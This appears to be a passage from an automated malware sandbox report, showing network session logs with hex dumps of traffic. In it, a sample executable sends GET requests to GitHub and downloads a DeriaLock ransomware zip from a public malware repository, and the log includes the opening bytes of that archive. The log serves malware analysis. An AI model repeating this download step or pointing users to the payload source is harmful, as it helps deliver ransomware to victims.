2022-09-29 12:50:02 UTC	528	IN	Data Raw: 68 a4 f5 2a 19 a9 5a f7 a0 49 b4 9b ae 6c 71 ed 85 c4 15 e9 8d 45 fc ce 67 19 a0 58 e4 4a c1 11 a6 c3 07 4d b4 8e 49 83 6d 6d 51 e0 4c c2 7f 26 58 9e 6e 08 ce f8 ce 18 71 5a db f3 da 00 9d c4 db 33 97 0e 75 d2 6c f6 d8 66 df 40 2a bf 6d 7c 61 14 6d 3b 35 00 8b 2c 3d f0 47 32 7a 5d ba 4a e0 62 42 71 c3 77 69 b3 fb cf 7d 21 fc 46 e6 50 e1 6f f0 ba 0c 91 a6 bd be aa e0 15 57 76 5c 6d 37 ba 8e b2 a7 52 6b dc 56 01 1f 73 ca 54 e2 dc b9 99 06 ce d5 f3 67 ba 68 d2 42 91 ad 24 09 d9 3a 33 43 f0 a8 e7 a9 5e 8d 7a 4b 4d 93 30 7b 23 9d 7d 64 97 62 b8 b0 2c 7f 7d 86 28 6e 1e 5c b8 be 88 75 13 b4 03 56 22 0a dd 50 7d a6 b8 10 b5 a3 8f 1c 6b 86 c3 19 54 30 4a a1 44 14 b0 fc ca c0 56 5e e5 5b 0d 60 d6 32 0a 23 c4 59 8b 45 53 0c 09 dc 3d 1c 50 08 3f e5 c7 4e a6 2b ae 44 Data Ascii: hZIlqEgXJMImmQL&XnqZ3ulf@m\|am;5,=G2z]JbBqwi}!FPoWv\m7RkVsTghB$:3C^zKM0{#}db,}(n\uV"P}kT0JDV^[`2#YES=P?N+D
2022-09-29 12:50:02 UTC	530	IN	Data Raw: f0 b6 ff 5e 86 bd 6d 4b 60 ba ce ca eb 1c ab c1 ac 61 85 f7 06 87 04 c1 e5 77 2a c5 4b ad 39 6e d9 3a 53 98 43 8a a9 9c 4a 6d 0b 8f 54 17 57 99 7a cd 0e b2 85 e9 3e 21 33 7d 8c 02 8d a9 aa a4 b0 c6 f2 b3 36 84 bd eb 63 ec a5 ac 3a 2f 68 65 ed a0 8b c1 11 fd 5d 89 01 c4 e7 a8 b9 a4 bf 87 57 75 01 ce f1 eb 41 de 8e f2 99 75 6b 73 24 1d 42 d8 7b a8 e4 d2 39 ae 9e 99 13 3e 1e 18 f7 f2 f5 86 05 ee d1 d5 df 49 fe 3d fc 77 5b 93 64 09 75 66 ae 92 07 b0 19 2a a3 14 03 8c 05 af d0 ad d1 dc bb b8 22 a1 41 6a 1d 13 da 67 1e 0c 37 2a 93 71 1e 1a f7 fa 8d d4 73 b5 8f 34 a1 2b c3 fc d6 3f cb f6 80 0e 8b 75 20 c4 ff d3 b1 70 0d 4c 07 c1 9f 38 a1 75 56 ee 1f 1a 00 22 0f e4 b2 12 15 dd 63 12 24 d1 c3 35 9e 28 37 01 d5 22 2e 2c 01 eb b9 45 06 b1 0a 08 f4 93 84 a8 1f 5a ce Data Ascii: ^mK`awK9n:SCJmTWz>!3}6c:/he]WuAuks$B{9>I=w[duf"Ajg7*qs4+?u pL8uV"c$5(7".,EZ
2022-09-29 12:50:02 UTC	531	IN	Data Raw: df 0b b4 96 3b 14 03 55 cd 0e 2b 6d d4 12 a9 22 63 a6 41 19 1b 00 19 d4 9b 88 9a 44 69 63 0d 98 45 59 fe 7c ec 0d e8 e4 1a 3a ca d1 34 d3 16 6e fe 00 f9 70 f0 2a 1b be c4 2e 74 ae d9 c8 49 cf 71 51 01 2c 74 23 c1 14 34 ff 0a b7 d2 9a 86 69 07 31 43 fb d6 d3 34 dd 85 3d 21 5a 06 b1 20 39 53 18 62 ba e1 8c 4a bf 9f 78 04 bc 9b 0d 9f 98 fd 73 d3 48 e8 f7 22 5e bc 19 2a 98 5f e3 c4 22 f4 d9 ed 7c df 51 8a 02 87 ed 49 b9 b6 ab eb 48 69 c6 4b d9 bf b3 51 91 84 6e 60 5b 07 e4 1e b9 3a 9e b6 8f 25 f3 70 11 65 0d 24 91 36 4d 26 d2 10 a1 db 11 cc 1f f6 3f a9 e5 99 a1 d5 26 35 f9 b5 ee 29 91 39 ef e3 fd 2f 3c ce 61 49 22 83 ef 6b 8d 79 90 16 25 56 cc 76 e8 37 01 e5 31 2b 07 c4 61 7e 67 9e 1e f5 08 7d 1b b8 b4 f7 70 b4 82 22 38 04 b8 c9 17 05 d5 b7 4c c7 4e 96 09 d0 Data Ascii: ;U+m"cADicEY\|:4np.tIqQ,t#4i1C4=!Z 9SbJxsH"^_"\|QIHiKQn`[:%pe$6M&?&5)9/<aI"ky%Vv71+a~g}p"8LN
2022-09-29 12:50:02 UTC	531	IN	Data Raw: f7 25 70 99 e8 5f f8 48 e6 a8 16 17 99 dc b6 51 d8 6d 2b a5 a9 57 9a 79 db 40 75 74 cc 66 2d 8c 0a 06 f9 6f 7e dc 53 7d 94 32 43 43 e9 98 66 7e 44 8f 28 c1 59 0d dd 73 e8 b0 9a 25 f1 c3 7a 50 84 ab a6 b1 d4 19 46 60 32 76 3a 86 7d 48 17 4f 50 35 c7 9c b6 e6 72 e2 95 42 39 a8 79 94 eb 2c 02 6f 9f d5 0f 7e 54 c4 3c 33 7f 77 c3 97 99 de 1b 21 14 7f cb a6 d9 29 87 c6 5f 44 3a 17 70 bd fe e2 fc 3f ca 08 b9 c8 6a c5 b8 c7 bb 79 74 35 79 dd 5e eb 54 37 73 51 95 08 24 14 72 48 f9 aa f9 9e 07 87 a2 05 ac 17 73 33 7f 12 95 71 30 f7 c1 61 e1 0a ac 14 5a e3 d7 12 67 d3 8b af 49 bc 88 eb 97 c9 00 c0 e4 02 86 94 44 f2 10 5f 5a 59 a3 fa 58 65 1c 57 56 66 9b f4 09 94 46 22 3d 9c 19 fb 11 d6 6f 19 4b b4 28 be 06 e1 63 42 e7 da d2 da 34 9a 10 22 cb a5 31 6a c3 b3 b0 e1 e1 Data Ascii: %p_HQm+Wy@utf-o~S}2CCf~D(Ys%zPF`2v:}HOP5rB9y,o~T<3w!)_D:p?jyt5y^T7sQ$rHs3q0aZgID_ZYXeWVfF"=oK(cB4"1j
2022-09-29 12:50:02 UTC	547	IN	Data Raw: 67 dc 14 31 58 19 f2 1f 0f 8e 06 22 d3 57 15 72 f4 42 06 d7 4f f1 83 13 69 64 06 a8 0d 76 7e 13 22 46 95 f3 d8 93 01 c5 4c 25 e2 d1 84 f5 fc 29 11 96 d8 ba 22 d2 48 7b 22 08 5f c2 1e fe 3a f1 46 ec 80 89 d8 77 97 31 08 f1 bd cb 38 30 b0 9f 91 23 b4 e8 af e3 69 8d 19 97 f5 f5 4a 99 f7 da 3b d2 4c 1b 96 6a d3 e1 5f 68 a5 00 e7 06 16 29 ae 20 d7 0e 8c 60 8f 9d 61 73 12 4b 3f cb a9 a4 3b c0 6f 2d 0a ee b2 3e 57 23 f4 39 59 16 66 65 80 69 97 3a 0a ca 0e 30 32 4d a4 93 6c f8 20 0d 77 a1 e9 a5 73 97 d2 f2 47 a5 b1 c3 c8 51 f5 35 d1 a4 9d 0c 66 45 26 24 ef 00 f8 8a 28 22 5b 61 a4 76 ae de 77 33 30 b9 e2 e0 eb dd 2b a7 76 51 bc f2 be c7 bc 41 46 b7 6d e1 bd c7 2e 23 cf c5 17 88 95 4b b2 58 c7 46 75 b2 b2 b2 92 c5 1d ca c4 01 34 c3 09 97 af c3 2c 74 f3 5d 26 81 bd Data Ascii: g1X"WrBOidv~"FL%)"H{"_:Fw180#iJ;Lj_h) `asK?;o->W#9Yfei:02Ml wsGQ5fE&$("[avw30+vQAFm.#KXFu4,t]&
2022-09-29 12:50:02 UTC	563	IN	Data Raw: de 4d 9a 8e 59 8d c1 b2 14 3d 9e 92 ed fd 47 2d fd da 4d 94 db 7e a0 48 9f d2 9d 29 e3 eb 4b 25 0c 57 b4 5f df e1 22 87 ce 6e a3 71 92 1e 54 d6 f9 d6 31 90 1f cc fb de c0 90 07 33 cb e9 b3 99 ee f4 13 00 15 d5 ec 65 4c 16 4e a3 54 30 bd fa 6c d2 ae 0e c1 3c 03 ec 80 d5 cd bf 1a ad 79 6a b2 65 c7 9f 66 a7 be de 44 74 24 72 96 4d 81 6f 1d e6 88 58 fc 8e 20 98 11 1d 18 27 6e 72 bd b5 c5 8d f9 81 fb cf d0 3b 24 06 f3 f8 b2 62 19 8d 5c 37 72 e6 b0 9c e7 8e 4e 3a a3 5b 19 ce e1 aa f3 29 29 22 3f 15 96 8f 77 c4 1e e4 40 7c 89 7e fb dd d5 94 bc aa 30 db 1c 55 67 62 f2 27 fe e4 ef 3a b5 16 8c 6c 23 80 eb 1c 0a 4f db 11 de a6 06 ac f4 02 85 38 ea f0 a8 49 06 1f d0 43 b4 ad 60 d6 b5 b7 f4 60 ec 4c 3a 0e cd de aa 3b c5 61 e4 70 d5 f8 fd c8 b5 0b 0c e7 38 0c d1 c5 59 Data Ascii: MY=G-M~H)K%W_"nqT13eLNT0l<yjefDt$rMoX 'nr;$b\7rN:[))"?w@\|~0Ugb':l#O8IC``L:;ap8Y
2022-09-29 12:50:02 UTC	579	IN	Data Raw: 58 c4 6f c1 18 0b 51 41 9c 3a 4f 19 2a ec fa 4c 17 70 3f 35 09 86 db 43 3b b7 8b 78 47 45 08 2b 85 af 10 69 71 d9 c9 a8 5c 74 1d e9 d1 e2 40 9a dc 7c f3 a8 39 63 5b d7 fd d9 8c 65 b3 ae ac e1 64 5b 74 b5 6d 6d 95 92 5b 29 a1 fd 20 5b 6c 52 5a 7c ec dd 0b ec 7b 5c b6 2b 77 5d 1c a0 36 51 5e 9c 2b 99 13 88 2c 1a 91 ab 63 37 63 bd 67 17 79 03 e8 84 d8 66 a6 ab e6 f3 f5 f4 db b5 13 ec 04 9e d9 36 32 f7 95 d5 23 37 57 cc 6b ff d6 ac ae 18 28 d5 b9 b0 1e 55 4a 21 ea 71 72 4a 60 a3 97 5a cd 39 62 39 a1 9e 4e e8 18 54 0d 30 07 0c 78 5d 8f 1d 2c 10 7d c1 40 f7 86 6b eb 81 4b b2 15 a9 db 17 51 db e6 5f cc a3 d1 53 73 df ef 66 3a 8b f2 b7 8e 58 e1 5c 30 79 f6 a4 48 9b 75 e4 16 63 c3 fa 3a 7d 63 e5 fe 76 1e f5 f3 01 c1 db be 5b 16 81 cc 39 9c f5 f7 8c 17 e5 15 95 20 Data Ascii: XoQA:O*Lp?5C;xGE+iq\t@\|9c[ed[tmm[) [lRZ\|{\+w]6Q^+,c7cgyf62#7Wk(UJ!qrJ`Z9b9NT0x],}@kKQ_Ssf:X\0yHuc:}cv[9
2022-09-29 12:50:02 UTC	595	IN	Data Raw: 5f 28 3f af a5 64 40 57 d9 b8 38 76 91 c4 d6 20 fa 25 cf f4 be 17 05 26 a0 33 f3 a9 44 55 c1 99 e6 9e c9 2d ca d1 54 9c 5d 1d a8 d9 d6 a6 69 a4 ef e5 ab d6 42 f7 75 0d 40 a8 63 19 69 e8 ea b1 cb 42 18 0a 75 af 82 bb dd 1b 6f 16 28 75 2b c8 eb e9 c8 22 bd 37 4e b2 64 92 77 b2 a1 2d 16 fb 0a 15 c2 13 7b 29 ce 8d 22 19 3a b9 60 b1 5c 59 9d 40 37 a4 14 2c cf 2a 4b 8b 4a da bc fe 04 d9 cc 13 34 98 11 36 55 7e 17 6e 0d 9b ef d5 67 f9 f8 6b d5 e3 16 58 f1 3c 66 d8 72 70 0b 7e 75 24 e6 57 44 a9 58 97 89 87 e2 a8 ff e6 6d d4 78 dd 71 74 63 b6 cc 7c 6f 38 64 e2 71 c6 22 83 6c 49 04 6d a0 39 bd d6 22 60 89 7f b4 48 17 dd f6 43 45 61 63 5f e1 87 d9 6b 36 fa 45 73 70 bc 07 6d 0f 3d 19 6b bb 13 a8 b2 76 d6 c7 6c 99 20 94 fe 13 2f c1 53 f8 9f 8a 3a 89 cc dc 8a d2 86 60 Data Ascii: _(?d@W8v %&3DU-T]iBu@ciBuo(u+"7Ndw-{)":`\Y@7,*KJ46U~ngkX<frp~u$WDXmxqtc\|o8dq"lIm9"`HCEac_k6Espm=kvl /S:`
2022-09-29 12:50:02 UTC	611	IN	Data Raw: 1d d7 0a b2 c6 c3 92 13 28 91 87 a6 d3 70 1c 21 99 0f 71 f5 03 51 b8 b3 6b 81 ae 2d c7 cb a3 54 65 e2 d0 8e 42 a5 12 86 45 34 29 74 e9 1c b0 57 ef 08 b5 ba 9d d3 2f a2 a2 d3 eb 1d 5a 73 b5 4a 55 41 58 50 a8 4c 04 78 74 98 6e 47 5d 33 33 1c 07 59 57 7f ff fd 3b b5 c4 ee f8 bb 6f 59 61 7c 8a d8 6c ac 6d d7 78 81 25 6c 1b 15 ef e7 20 bc 8e ac b2 c9 86 b9 f9 e6 ae f3 82 fb 9e a8 78 10 81 8d 36 44 10 5a 78 a3 dd f7 e3 63 78 7b cf 04 c2 5b 97 72 0f ad 73 a7 b7 cd 33 97 3f c8 8f dc c9 c8 3d 0a ed 1d f9 d0 04 78 38 7e 76 34 04 28 57 7a 37 4e ef b6 77 2d 02 8c 04 b6 c6 d4 49 0c ef 5c 46 54 c9 e2 bc 1d e4 97 5d ba f6 3a 9f 22 fb f8 b1 7e bb 77 71 ae 2e c0 b2 0a 3d f3 d6 1f c4 48 a9 95 b5 ce cd 62 b3 53 80 90 a4 cd 43 13 22 d9 f7 7e 1a cd c2 4c 42 72 8d 15 c7 c6 9a Data Ascii: (p!qQk-TeBE4)tW/ZsJUAXPLxtnG]33YW;oYa\|lmx%l x6DZxcx{[rs3?=x8~v4(Wz7Nw-I\FT]:"~wq.=HbSC"~LBr
2022-09-29 12:50:02 UTC	627	IN	Data Raw: 64 8d 3f 83 70 c0 19 4e e9 8a 25 64 79 61 85 c9 06 7f e9 fd 75 50 b2 da 53 a6 2f f5 54 68 94 9d 1a 32 72 87 ba 30 03 35 10 aa fd 92 dc ad de 6b 0d fb b4 7d af 47 c3 21 14 ca 78 d4 7d 13 58 87 73 7f 70 b0 71 59 1b 71 51 6a 1e db f5 95 76 59 1f f5 8a 59 cf f2 95 3f bb 0a 82 f8 ea e5 d1 dc 7e 45 dd 14 c9 a4 87 e2 4d c8 c2 5a 58 5c b2 bd d4 0d d7 b2 73 7e 5c 1c 5f 05 83 69 78 74 dc a2 64 a4 6b a3 0d 09 ac 78 4e 65 de 49 d5 79 9a 75 98 17 7e 73 b5 d2 52 51 c8 4f 14 13 33 09 30 bb 2c 02 06 06 b4 b5 6e 69 17 4d a5 4f d7 c1 19 6c f9 b4 f0 e0 49 ab a8 31 26 fb 20 31 aa 14 0e 6d 86 03 ab 72 9f 95 e9 99 75 07 03 1c 7f 7e ff ca f6 6c d4 52 2a e0 b0 99 7e 86 d3 38 e6 74 ba 0b 34 e3 f4 60 c1 91 73 fb d7 2c 90 d3 97 c8 f7 94 04 3d f5 e8 89 cf ea 88 8e 19 b5 5b 03 69 5a Data Ascii: d?pN%dyauPS/Th2r05k}G!x}XspqYqQjvYY?~EMZX\s~\_ixtdkxNeIyu~sRQO30,niMOlI1& 1mru~lR*~8t4`s,=[iZ
2022-09-29 12:50:02 UTC	643	IN	Data Raw: 8d c0 e7 26 91 fb 60 0b bf f1 6f 26 ab b5 57 3c 89 fd e3 fb dc f6 e2 f5 80 df 70 2e 75 42 75 f5 42 17 31 63 fe 91 be 3e 43 19 0a d1 2e 3d 65 16 45 60 bf b9 29 5e 93 48 d0 9d 1f 1b c5 bf ae ff fa 2f 23 32 d0 15 95 d8 d0 c9 f9 fb ff 22 c0 63 d3 6e 25 d0 ce b3 cf 2a a6 41 dd bf 67 65 46 31 e5 6b ea 95 c7 12 4f 9e 62 0f cf 8c be 61 d8 25 7c a8 0d 93 47 10 79 c5 02 98 56 7e c0 d9 37 70 27 83 be df 6e a2 0f 52 33 a1 fe c1 1e 59 bb 7d fa 58 4f 3e 9b c9 72 d7 f2 31 30 24 55 60 bc 93 62 6d e6 b0 b7 63 af 5b 61 e9 c0 7d 35 9c 95 03 3b 83 f3 97 d9 4e 0d 31 9c be fa e0 0d f1 5d 79 06 4c c1 26 22 1f 30 7b b0 49 7d 24 c5 91 b1 18 64 aa d5 38 d3 57 9c cc 7a ac 5e c9 99 b7 84 a6 d4 a5 42 40 1e 74 55 b9 f0 52 3a af 91 d3 ef 64 1f 81 e0 33 57 03 6c 8a 3e 71 88 9a a5 17 e7 Data Ascii: &`o&W<p.uBuB1c>C.=eE`)^H/#2"cn%*AgeF1kOba%\|GyV~7p'nR3Y}XO>r10$U`bmc[a}5;N1]yL&"0{I}$d8Wz^B@tUR:d3Wl>q
2022-09-29 12:50:02 UTC	659	IN	Data Raw: cd 32 fa 4e 2b ba 92 94 af f3 89 63 24 ba 3d bc 6b 40 0d dd 62 98 28 1e 1d c2 3b 03 ca 75 4c bf 88 13 44 90 ca c7 97 b3 2a 6d 34 e6 35 1c a6 63 59 1a 30 87 f9 89 8b 66 b1 71 7d b8 bf df 03 83 ff c7 96 e9 15 3c e8 78 0b 6a 9a 04 25 fe a4 36 72 08 4a ac bb ed a9 20 30 bf 96 84 4b df 43 92 87 8c 5a c5 ac 75 38 13 12 88 52 a8 22 35 dd 61 9a 30 24 ef a4 1c 72 ca 5f 5e cf 7f cf 47 b1 9b 5d 47 38 4c 4d 12 3c 07 9d 49 ca 97 b9 b4 c6 e9 fe 6c 48 f3 0f 9c 77 99 be 9c f1 42 77 24 33 cc 2c f0 b0 fa b2 86 f1 02 fe 0c 79 74 cc 33 72 5f c7 1a 96 ac 23 c8 f3 ca ef 09 4f 97 48 ad b6 c1 3b 5d 6c 2e 07 4e f0 b3 7c 36 a0 08 c4 93 41 be 0e 46 a3 06 b9 59 f2 d7 cf f5 e7 c4 44 db ed 1f 47 6d f0 79 3a a3 d1 ff dc 08 bc 10 91 b3 80 ef 50 bd 3e aa 68 ed f6 f6 7d 1f ff 1d 23 ca 3c Data Ascii: 2N+c$=k@b(;uLD*m45cY0fq}<xj%6rJ 0KCZu8R"5a0$r_^G]G8LM<IlHwBw$3,yt3r_#OH;]l.N\|6AFYDGmy:P>h}#<
2022-09-29 12:50:02 UTC	675	IN	Data Raw: 17 e7 83 c6 83 6e e7 f0 70 82 cc 29 37 25 bf ea 1e 92 96 71 3d 3d 09 44 93 c2 44 82 d3 e9 94 3e 1d d4 73 92 d0 36 bf 37 83 74 8b b9 e5 48 25 a2 5f 07 ee 20 59 95 c9 f8 f9 ae 80 87 4f 77 7d ba 63 f0 22 12 0e 4f 47 04 c0 9c fb da 46 22 91 d1 35 c1 35 85 20 bb 31 29 d2 02 a9 52 33 25 9d 27 b0 2b 26 c3 48 3a ec cf 4a f1 3b 07 61 3c 7f 6d 66 44 57 19 ee 23 91 15 e0 12 c1 c6 f9 28 1b 8a 52 95 4f 84 ac 2b 56 6f 2d b3 a0 bc 36 61 6b 74 c3 f4 0a dd 4c b0 36 3f c6 0a ad 83 e3 0d dd c3 ba aa d8 0e df f1 81 b7 27 07 ec 07 3c 87 d2 f5 c3 61 02 6e 43 07 5a 4f 79 e7 0f 9d b7 0a 6c 7a 0e c8 67 a5 b2 10 b2 d8 8c ab 2b 18 f1 40 1c 34 0b b0 12 97 d8 ed a0 d7 57 d1 29 b9 e0 ab ff 5f 23 6f df 30 c7 03 57 0f 01 4f eb 3a 45 0f 4a 8a 4b d6 60 b4 80 3d 2f e2 ac b1 8d 15 32 bb ab Data Ascii: np)7%q==DD>s67tH%_ YOw}c"OGF"55 1)R3%'+&H:J;a<mfDW#(RO+Vo-6aktL6?'<anCZOylzg+@4W)_#o0WO:EJK`=/2
2022-09-29 12:50:02 UTC	691	IN	Data Raw: e9 71 77 e9 c7 3d c7 de cc a6 2f 83 4e 91 9d eb 03 12 ab 98 95 4e 57 57 b3 e4 51 0f 22 a7 22 23 da cf f5 b2 d9 e8 69 b3 7a a1 34 a4 ae 7b 5e 8a e1 b1 60 c7 c1 bb 1f b3 46 38 3c d1 0d 94 2b 89 da 10 74 f9 3f a2 37 26 9b e7 b8 4a 5f 72 a2 d3 52 50 64 ca c0 a4 38 05 74 c6 4e 9c 89 6d 7a 9d 5c db 34 0b 05 c2 f0 5e 80 9e 1e 0d ff 65 8c 41 80 57 0e 9e 47 08 0e 04 bc ef 64 42 bd 9d db d7 58 9a 0f d2 00 e5 cf 4d 6d 73 ea 09 76 37 b4 1f bd ea b3 9b 60 96 4b c6 9e 64 d2 5a e5 67 da 26 88 20 b5 af 00 4c 16 69 a0 8c b8 f3 53 d2 74 9a 0b 7e 96 77 89 c8 6f 67 f3 f6 41 99 62 35 89 dc 1b 2b d7 4b 8c 7d 31 f7 18 44 20 61 73 74 16 5f ae 3e bd 68 11 44 9e 7c 92 37 be 6e bf e4 15 3f bd 55 7d 30 34 cd 75 f8 1c 50 ee 2b 1f 69 5f bd 63 17 8e 2a 64 4a 90 8e cb b9 77 fb c9 5e ef Data Ascii: qw=/NNWWQ""#iz4{^`F8<+t?7&J_rRPd8tNmz\4^eAWGdBXMmsv7`KdZg& LiSt~wogAb5+K}1D ast_>hD\|7n?U}04uP+i_c*dJw^

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49725	140.82.121.4	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:50:08 UTC	698	OUT	GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1 Host: github.com
2022-09-29 12:50:08 UTC	698	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 29 Sep 2022 12:48:33 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: https://render.githubusercontent.com Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:50:08 UTC	698	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49726	185.199.108.133	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:50:08 UTC	700	OUT	GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1 Host: raw.githubusercontent.com
2022-09-29 12:50:09 UTC	700	IN	HTTP/1.1 200 OK Connection: close Content-Length: 215551 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/zip ETag: "ee00430e92951d5ab964c364741ca65eb7489f27da783a2e2ec395efcca6982a" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 0813:121E:2686D8:32DEE8:6335931B Accept-Ranges: bytes Date: Thu, 29 Sep 2022 12:50:09 GMT Via: 1.1 varnish X-Served-By: cache-mxp6957-MXP X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1664455809.899003,VS0,VE210 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: 13718146793df7587da1c949e0570fb92e1f1587 Expires: Thu, 29 Sep 2022 12:55:09 GMT Source-Age: 0
2022-09-29 12:50:09 UTC	701	IN	Data Raw: 50 4b 03 04 14 00 01 00 08 00 b9 44 9d 49 fb a7 08 f7 49 49 03 00 00 90 07 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 44 65 72 69 61 4c 6f 63 6b 2e 65 78 65 8f 5e c1 d2 4e 0d 5f 39 3e ec 9e 1a 00 e0 ba e5 f5 be 9e 96 4e e6 01 53 65 32 9c ef 35 79 aa 89 be e7 a1 c5 67 ef 92 69 5f 6a cd 1e 64 76 70 1a 6a aa 4b 9a fa 65 0d 36 ac dc 2d fa 18 41 f4 90 27 10 c4 f7 86 51 d7 e1 38 f9 19 23 6a 06 4f b5 90 c1 dd c3 23 3c 19 77 e3 44 06 84 ce 90 3c c2 c7 5f 60 30 36 92 57 7f 96 fa 21 09 c1 ef 1a 4b 1b dd 2c 93 f5 d6 b9 79 75 8a 42 65 ef 69 bf c5 84 8a 58 98 3b 72 e6 2b a7 c3 d9 22 01 60 13 a6 b8 0a 02 a3 ac 92 01 17 24 1f 36 a3 d5 4a 7e fc d3 56 64 b6 8b 10 96 4c 8b 86 ef 7b 8c dd af 2b b6 2c 1f b6 9f 38 6c 79 5c 08 53 02 ea be fc 69 9a ee fb 19 3c 74 bb 8d 5e Data Ascii: PKDIIIEndermanch@DeriaLock.exe^N_9>NSe25ygi_jdvpjKe6-A'Q8#jO#<wD<_`06W!K,yuBeiX;r+"`$6J~VdL{+,8ly\Si<t^
2022-09-29 12:50:09 UTC	717	IN	Data Raw: b9 04 ef e5 b5 1e 93 b8 4e a1 b4 53 1a cc fc 6d 97 50 7c 82 55 5b 35 40 77 ce 45 20 7c 9b dd 70 78 ee 63 96 27 e6 e7 22 3e 0f 4a 99 2c 6d d3 ec 98 3d cf 4d 0e b2 22 70 c5 9c 7b 6f e4 a2 0b a8 15 da 6f 30 b6 b7 da c3 fb 9d 45 b4 99 ad 6f 98 f7 48 d6 6f 19 4a 4a f2 fd e4 b3 87 ba 45 80 fd 8a e9 bc 49 83 69 71 02 7c b4 57 fe c9 18 62 88 bc a1 13 e6 f9 f5 55 6e fe 08 1a 0b b8 97 eb ff 58 7b 21 c2 10 a4 91 95 04 76 7d cd e7 51 91 41 45 46 ec 5a 7a 07 14 ec 02 e5 17 3d 8f 7e e6 79 bc ac 3a cd bd e6 c0 a9 3e f2 64 6e 91 13 7b 50 fd e4 79 f7 5d 13 47 16 8a db c8 59 40 12 97 bb bb 21 a5 f8 74 2a e8 7f d5 3d 34 ad 16 80 71 a0 ee 3f 4a a2 ec 2a 28 51 a1 c7 4c a2 cd a7 c5 fa 0a b5 4c 22 b7 46 15 39 51 9b c1 6c 26 de 12 e3 f7 6a f1 a5 d5 00 f1 99 e5 3f 48 cc 54 ea 6a Data Ascii: NSmP\|U[5@wE \|pxc'">J,m=M"p{oo0EoHoJJEIiq\|WbUnX{!v}QAEFZz=~y:>dn{Py]GY@!t=4q?J(QLL"F9Ql&j?HTj
2022-09-29 12:50:09 UTC	733	IN	Data Raw: be b5 f9 04 4b 96 10 c4 84 c9 fc 9a e1 19 8f d9 99 51 55 74 ca 5c c7 69 99 8a bc dc 70 ca ce fe f5 48 2e 64 75 41 cb db d8 b3 2e ab 9f 7e 80 9c 94 20 5b 3b 35 29 92 55 c6 15 9f db dd 5a 5c 7c 42 0f 3d 08 6b 51 46 54 68 7a 1b 07 e1 72 47 69 2a 49 1a 5d 63 05 b9 5d 2d b5 aa b3 96 40 60 cb ec 87 11 0e ea 11 bf 4f 9e b0 34 af 98 23 e2 f1 97 8e 0f be f2 ca 9b 45 fd 97 50 cd 7b 41 f5 64 e6 fa c5 c1 be e7 be ec 2b 35 0b 54 e7 26 f1 be 39 d7 3b 3b b5 78 c0 ae d0 1e 9d 91 e6 b2 a5 ec 94 31 89 6b b1 b0 26 3d db de 44 60 e4 2a 29 be 93 46 29 6f 8a 92 9a 5f e3 01 5e 0d 67 02 89 56 9d 29 b9 73 b9 22 04 64 20 07 8d a0 43 f2 08 4d d4 66 8e 2b 93 14 4c 4a 0c e1 27 3c 12 fd fb 13 a3 78 d5 bb 67 86 73 b3 32 82 cf c1 9d 57 0f a3 e9 27 00 2e 05 e2 3c 92 dd ec be da 9f cf f4 Data Ascii: KQUt\ipH.duA.~ [;5)UZ\\|B=kQFThzrGiI]c]-@`O4#EP{Ad+5T&9;;x1k&=D`)F)o_^gV)s"d CMf+LJ'<xgs2W'.<
